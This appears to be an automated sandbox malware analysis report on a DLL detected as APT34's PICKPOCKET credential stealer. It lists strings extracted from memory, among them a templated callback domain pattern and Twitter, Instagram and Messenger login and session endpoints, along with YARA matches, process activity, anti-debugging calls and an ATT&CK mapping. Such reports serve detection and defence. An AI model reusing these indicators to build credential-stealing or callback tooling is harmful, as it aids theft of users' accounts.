Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://ocsp.digicert.com0R
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: A8xYhQFvXo.dllString found in binary or memory: http://www.interestvideo.com/video1.php
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.
Source: A8xYhQFvXo.dllString found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: A8xYhQFvXo.dllString found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: A8xYhQFvXo.dllString found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://ads.google.com/nav/selectaccount
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: A8xYhQFvXo.dll | String found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: rundll32.exe, 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235936438.0000000010171000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245392829.0000000010171000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://twitter.com/
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: A8xYhQFvXo.dll | String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://twitter.com/ookie:
Source: A8xYhQFvXo.dll | String found in binary or memory: https://twitter.comReferer:
Source: A8xYhQFvXo.dll | String found in binary or memory: https://twitter.comsec-fetch-dest:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://www.digicert.com/CPS0
Source: A8xYhQFvXo.dll | String found in binary or memory: https://www.instagram.com/
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://www.instagram.com/accept:
Source: A8xYhQFvXo.dll | String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: A8xYhQFvXo.dll | String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://www.messenger.com
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://www.messenger.com/
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://www.messenger.com/accept:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://www.messenger.com/login/nonce/
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://www.messenger.com/login/nonce/ookie:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll | String found in binary or memory: https://www.messenger.com/origin:

System Summary:

Malicious sample detected (through community Yara rule)
Source: A8xYhQFvXo.dll, type: SAMPLE | Matched rule: APT34_PICKPOCKET Author: unknown
Source: 1.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Author: unknown
Source: 4.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Author: unknown
Source: 7.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Author: unknown
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10033BFE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10023C51
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_1002E58A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10042F70
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10040780
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6652 -s 712
Source: A8xYhQFvXo.dll | Static PE information: Resource name: CRX type: 7-zip archive data, version 0.3
Source: A8xYhQFvXo.dll | Static PE information: Resource name: FF type: 7-zip archive data, version 0.3
Source: A8xYhQFvXo.dll | Static PE information: Resource name: FRIENDS type: 7-zip archive data, version 0.3
Source: A8xYhQFvXo.dll | Binary or memory string: OriginalFilenameFsFilter.sys vs A8xYhQFvXo.dll
Source: A8xYhQFvXo.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: A8xYhQFvXo.dll, type: SAMPLE | Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 00000004.00000002.236067014.000000001028B000.00000008.00020000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000007.00000002.245505715.000000001028B000.00000008.00020000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 1.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 4.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 7.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: A8xYhQFvXo.dll | Static PE information: Section: .rsrc ZLIB complexity 0.999259599673
Source: classification engine | Classification label: mal60.winDLL@10/12@0/0
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6896
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6652
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7004
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DB2.tmp
Source: A8xYhQFvXo.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts (6 occurrences)
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello001
Source: A8xYhQFvXo.dll | Virustotal: Detection: 17%
Source: A8xYhQFvXo.dll | Metadefender: Detection: 18%
Source: A8xYhQFvXo.dll | ReversingLabs: Detection: 44%
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\A8xYhQFvXo.dll'
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello001
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6652 -s 712
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello002
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 712
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello003
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 712
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello001
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello002
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello003
Source: A8xYhQFvXo.dll | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: A8xYhQFvXo.dll | Static file information: File size 4890624 > 1048576
Source: A8xYhQFvXo.dll | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x170000
Source: A8xYhQFvXo.dll | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x118000
Source: A8xYhQFvXo.dll | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x179000
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Source: A8xYhQFvXo.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: A8xYhQFvXo.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: A8xYhQFvXo.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: A8xYhQFvXo.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: A8xYhQFvXo.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10037541 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_1002EB91 push ecx; ret 1_2_1002EBA4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10028D9A push ecx; ret 1_2_10028DAD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_1014BE00 _memset,SHGetSpecialFolderPathA,_strcat_s,PathFileExistsA,_memset,GetPrivateProfileStringA,_strlen,_strlen,PathRemoveFileSpecA,_strcat_s,_strcat_s,PathFileExistsA,PathFindFileNameA
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (20 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (20 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (20 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10147900 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10145A40 FindFirstFileA,FindClose
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort (6 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10023315 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10037541 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_1003AFFE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10023315 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10026CE8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10028D22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_101456A0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA, 1_2_1003585F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_10035CD8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_10035D3D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 1_2_10035D79
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,_xtoa_s@20, 1_2_1002B5DD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA, 1_2_10035F69
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_10145D10 _malloc,_memset,GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,__aulldiv

Mitre Att&ck Matrix

Techniques are listed per tactic column; a number in parentheses is the count of matching signatures for this sample, and techniques without one were not observed.

  • Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
  • Execution: Native API (1), Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd
  • Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
  • Privilege Escalation: Process Injection (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
  • Defense Evasion: Virtualization/Sandbox Evasion (1), Rundll32 (1), Software Packing (1), Process Injection (1), Obfuscated Files or Information (1), Steganography
  • Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
  • Discovery: System Time Discovery (1), Security Software Discovery (3), Virtualization/Sandbox Evasion (1), File and Directory Discovery (1), System Information Discovery (12), Remote System Discovery (1)
  • Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
  • Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
  • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
  • Command and Control: Encrypted Channel (1), Junk Data, Steganography, Protocol Impersonation, Fallback Channels, Multiband Communication
  • Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
  • Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
  • Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 346331 | Sample: A8xYhQFvXo | Startdate: 30/01/2021 | Architecture: WINDOWS | Score: 60
Signatures attached to the graph: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Machine Learning detection for sample
Process tree shown in the graph: loaddll32.exe started three rundll32.exe processes, and each rundll32.exe started one WerFault.exe process.

Screenshots

(screenshot thumbnails not reproduced in this text version)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
A8xYhQFvXo.dll | 17% | Virustotal |
A8xYhQFvXo.dll | 19% | Metadefender |
A8xYhQFvXo.dll | 44% | ReversingLabs | Win32.Trojan.Mingloa
A8xYhQFvXo.dll | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info. | 0% | Avira URL Cloud | safe
https://twitter.comsec-fetch-dest: | 0% | Avira URL Cloud | safe
https://www.instagram.comsec-fetch-mode: | 0% | Avira URL Cloud | safe
https://twitter.comReferer: | 0% | Avira URL Cloud | safe
http://www.interestvideo.com/video1.php | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Columns: Name, Source, Malicious, Antivirus Detection, Reputation

Name: https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: low

Name: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://twitter.com/compose/tweetsec-fetch-dest:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://www.instagram.com/
Source: A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://www.messenger.com/
